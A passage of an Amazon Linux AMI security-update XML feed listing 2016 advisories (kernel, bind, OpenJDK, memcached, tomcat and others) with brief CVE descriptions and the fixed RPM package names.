arch="i686"><filename>Packages/mysql56-debuginfo-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.33-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-757</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-757: critical priority package update for kernel</title><issued date="2016-10-20 04:11:00" /><updated date="2016-11-10 18:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5195:
CVE-2016-5195 kernel: remove gup_flags FOLL_WRITE games from __get_user_pages()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195" title="" id="CVE-2016-5195" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.23" release="31.54.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.23-31.54.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-758</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-758: important priority package update for bind</title><issued date="2016-10-20 11:32:00" /><updated date="2016-10-20 20:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2848:
CVE-2016-2848 bind:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2848" title="" id="CVE-2016-2848" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-759</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-759: critical priority package update for java-1.8.0-openjdk</title><issued date="2016-10-27 17:00:00" /><updated date="2016-10-27 17:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5597:
A flaw was found in the way the Networking component of OpenJDK handled HTTP proxy authentication. A Java application could possibly expose HTTPS server authentication credentials via a plain text network connection to an HTTP proxy if proxy asked for authentication.
1386103:
CVE-2016-5597 OpenJDK: exposure of server authentication credentials to proxy (Networking, 8160838)
CVE-2016-5582:
It was discovered that the Hotspot component of OpenJDK did not properly check arguments of the System.arraycopy() function in certain cases. An untrusted Java application or applet could use this flaw to corrupt virtual machine&#039;s memory and completely bypass Java sandbox restrictions.
1385402:
CVE-2016-5582 OpenJDK: incomplete type checks of System.arraycopy arguments (Hotspot, 8160591)
CVE-2016-5573:
It was discovered that the Hotspot component of OpenJDK did not properly check received Java Debug Wire Protocol (JDWP) packets. An attacker could possibly use this flaw to send debugging commands to a Java program running with debugging enabled if they could make victim&#039;s browser send HTTP requests to the JDWP port of the debugged application.
1385544:
CVE-2016-5573 OpenJDK: insufficient checks of JDWP packets (Hotspot, 8159519)
CVE-2016-5554:
A flaw was found in the way the JMX component of OpenJDK handled classloaders. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
1385714:
CVE-2016-5554 OpenJDK: insufficient classloader consistency checks in ClassLoaderWithRepository (JMX, 8157739)
CVE-2016-5542:
It was discovered that the Libraries component of OpenJDK did not restrict the set of algorithms used for JAR integrity verification. This flaw could allow an attacker to modify content of the JAR file that used weak signing key or hash algorithm.
1385723:
CVE-2016-5542 OpenJDK: missing algorithm restrictions for jar verification (Libraries, 8155973)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5542" title="" id="CVE-2016-5542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5554" title="" id="CVE-2016-5554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5573" title="" id="CVE-2016-5573" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5582" title="" id="CVE-2016-5582" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5597" title="" id="CVE-2016-5597" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.111-1.b15.25.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.111-1.b15.25.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.111-1.b15.25.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.111-1.b15.25.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.111-1.b15.25.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.111-1.b15.25.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.111-1.b15.25.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.111-1.b15.25.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.111-1.b15.25.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.111-1.b15.25.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.111-1.b15.25.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.111-1.b15.25.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.111-1.b15.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-760</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-760: important priority package update for python-twisted-web</title><issued date="2016-10-27 17:00:00" /><updated date="2016-10-27 17:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1000111:
It was discovered that python-twisted-web used the value of the Proxy header from HTTP requests to initialize the HTTP_PROXY environment variable for CGI scripts, which in turn was incorrectly used by certain HTTP client implementations to configure the proxy for outgoing HTTP requests. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a CGI script to an attacker-controlled proxy via a malicious HTTP request.
1357345:
CVE-2016-1000111 Python Twisted: sets environmental variable based on user supplied Proxy request header
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000111" title="" id="CVE-2016-1000111" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-twisted-web" version="8.2.0" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-twisted-web-8.2.0-5.5.amzn1.x86_64.rpm</filename></package><package name="python26-twisted-web" version="8.2.0" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-twisted-web-8.2.0-5.5.amzn1.x86_64.rpm</filename></package><package name="python26-twisted-web" version="8.2.0" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/python26-twisted-web-8.2.0-5.5.amzn1.i686.rpm</filename></package><package name="python27-twisted-web" version="8.2.0" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/python27-twisted-web-8.2.0-5.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-761</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-761: important priority package update for memcached</title><issued date="2016-11-10 18:00:00" /><updated date="2016-11-10 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8706:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in memcached&#039;s parsing of SASL authentication messages. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code.
1390512:
CVE-2016-8706 memcached: SASL authentication remote code execution
CVE-2016-8705:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code.
1390511:
CVE-2016-8705 memcached: Server update remote code execution
CVE-2016-8704:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code.
1390510:
CVE-2016-8704 memcached: Server append/prepend remote code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8704" title="" id="CVE-2016-8704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8705" title="" id="CVE-2016-8705" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8706" title="" id="CVE-2016-8706" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="memcached" version="1.4.15" release="9.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/memcached-1.4.15-9.13.amzn1.x86_64.rpm</filename></package><package name="memcached-devel" version="1.4.15" release="9.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/memcached-devel-1.4.15-9.13.amzn1.x86_64.rpm</filename></package><package name="memcached-debuginfo" version="1.4.15" release="9.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/memcached-debuginfo-1.4.15-9.13.amzn1.x86_64.rpm</filename></package><package name="memcached" version="1.4.15" release="9.13.amzn1" epoch="0" arch="i686"><filename>Packages/memcached-1.4.15-9.13.amzn1.i686.rpm</filename></package><package name="memcached-debuginfo" version="1.4.15" release="9.13.amzn1" epoch="0" arch="i686"><filename>Packages/memcached-debuginfo-1.4.15-9.13.amzn1.i686.rpm</filename></package><package name="memcached-devel" version="1.4.15" release="9.13.amzn1" epoch="0" arch="i686"><filename>Packages/memcached-devel-1.4.15-9.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-762</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-762: important priority package update for kernel</title><issued date="2016-11-10 18:00:00" /><updated date="2016-11-10 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8666:
The IP stack in the Linux kernel before 4.6 allows remote attackers to cause a denial of service (stack consumption and panic) or possibly have unspecified other impact by triggering use of the GRO path for packets with tunnel stacking, as demonstrated by interleaved IPv4 headers and GRE headers, a related issue to CVE-2016-7039.
1384991:
CVE-2016-8666 kernel: Remotely triggerable recursion in GRE code leading to kernel crash
CVE-2016-7039:
Linux kernel built with the 802.1Q/802.1ad VLAN(CONFIG_VLAN_8021Q) OR Virtual eXtensible Local Area Network(CONFIG_VXLAN) with Transparent Ethernet Bridging(TEB) GRO support, is vulnerable to a stack overflow issue. It could occur while receiving large packets via GRO path, as an unlimited recursion could unfold in both VLAN and TEB modules, leading to a stack corruption in the kernel.
1375944:
CVE-2016-7039 kernel: remotely triggerable unbounded recursion in the vlan gro code leading to a kernel crash
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7039" title="" id="CVE-2016-7039" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8666" title="" id="CVE-2016-8666" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.30" release="32.54.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.30-32.54.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-763</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-763: important priority package update for cloud-init</title><issued date="2016-11-10 18:00:00" /><updated date="2016-11-10 18:00:00" /><severity>important</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cloud-init" version="0.7.6" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/cloud-init-0.7.6-2.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-764</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-764: important priority package update for tomcat6 tomcat7 tomcat8</title><issued date="2016-11-10 18:00:00" /><updated date="2016-11-10 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6797:
1390493:
CVE-2016-6797 tomcat: unrestricted access to global resources
CVE-2016-6796:
1390515:
CVE-2016-6796 tomcat: security manager bypass via JSP Servlet config parameters
CVE-2016-6794:
1390520:
CVE-2016-6794 tomcat: system property disclosure
CVE-2016-6325:
It was discovered that the Tomcat packages installed certain configuration files read by the Tomcat initialization script as writeable to the tomcat group. A member of the group or a malicious web application deployed on Tomcat could use this flaw to escalate their privileges.
1367447:
CVE-2016-6325 tomcat: tomcat writable config files allow privilege escalation
CVE-2016-5018:
1390525:
CVE-2016-5018 tomcat: security manager bypass via IntrospectHelper utility function
CVE-2016-0762:
1390526:
CVE-2016-0762 tomcat: timing attack in Realm implementation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0762" title="" id="CVE-2016-0762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5018" title="" id="CVE-2016-5018" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6325" title="" id="CVE-2016-6325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6794" title="" id="CVE-2016-6794" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6796" title="" id="CVE-2016-6796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6797" title="" id="CVE-2016-6797" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-webapps" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.72" release="1.21.amzn1" epoch="0" 